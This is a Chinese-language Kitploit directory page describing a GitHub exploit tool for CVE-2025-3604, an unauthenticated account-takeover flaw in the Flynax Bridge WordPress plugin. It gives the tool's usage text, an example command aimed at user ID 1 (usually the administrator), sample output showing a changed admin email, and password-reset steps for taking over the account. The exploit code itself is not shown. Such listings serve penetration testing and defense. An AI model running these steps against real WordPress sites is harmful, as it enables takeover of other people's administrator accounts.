Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-3604 — Flynax Bridge <= 2.2.0 - 未认证的权限提升漏洞(通过账户接管) | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-3604
身份验证与授权权限提升密码攻击漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubnxploited/cve-2025-3604

CVE-2025-3604

Flynax Bridge <= 2.2.0 - 未认证的权限提升漏洞(通过账户接管)

查看仓库
121年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚨 Flynax Bridge <= 2.2.0 - 未认证权限提升(账户劫持)

📄 描述

用于 WordPress 的 Flynax Bridge 插件在所有版本(包括 2.2.0)中均存在 通过账户劫持实现权限提升 的漏洞。

该漏洞是由于插件在更新用户账户详情(如邮箱)之前,未能正确验证用户身份。因此,未认证的攻击者 可以更改 任意用户(包括 管理员)的电子邮件地址,然后发起 密码重置 以完全接管该账户。

CVE: CVE-2025-3604
CVSS: 9.8 (严重)
发布时间: 2025年4月23日
最后更新: 2025年4月24日


⚙️ 脚本输出示例

root@kitploit:~
Detected plugin version: 2.2.0
Version is vulnerable. Attempting exploit...
Exploit succeeded! Email changed to: [email protected]
Exploit By Nxploited (Khaled_alenazi) | https://github.com/Nxploited

成功利用后,攻击者可前往 WordPress 登录页面,使用 新设置的邮箱 点击 “丢失密码?” 来重置密码,从而获得目标账户的完全访问权限。


🚀 使用方法

root@kitploit:~
usage: CVE-2025-3604.py [-h] -u URL [-mail NEWMAIL] -id USER_ID

WordPress Flynax Bridge Unauthenticated Privilege Escalation via Account # By Nxploited (Khaled Alenazi)

options:
  -h, --help              显示此帮助信息并退出
  -u, --url URL           目标 URL
  -mail, --newmail NEWMAIL
                          要设置的新邮箱
  -id, --user_id USER_ID  要利用的用户 ID

🧪 示例

root@kitploit:~
python3 CVE-2025-3604.py -u "http://TARGET/wordpress/" -id "1" -mail "[email protected]"

说明:

  • -u: WordPress 站点的基础 URL。
  • -id: 要攻击的用户 ID(通常为 1,即管理员)。
  • -mail: 为该用户设置的新邮箱。

⚠️ 免责声明

仅供授权测试和教育目的使用,风险自负。

🧑‍💻

作者:Nxploited ( Khaled_alenazi )

下载工具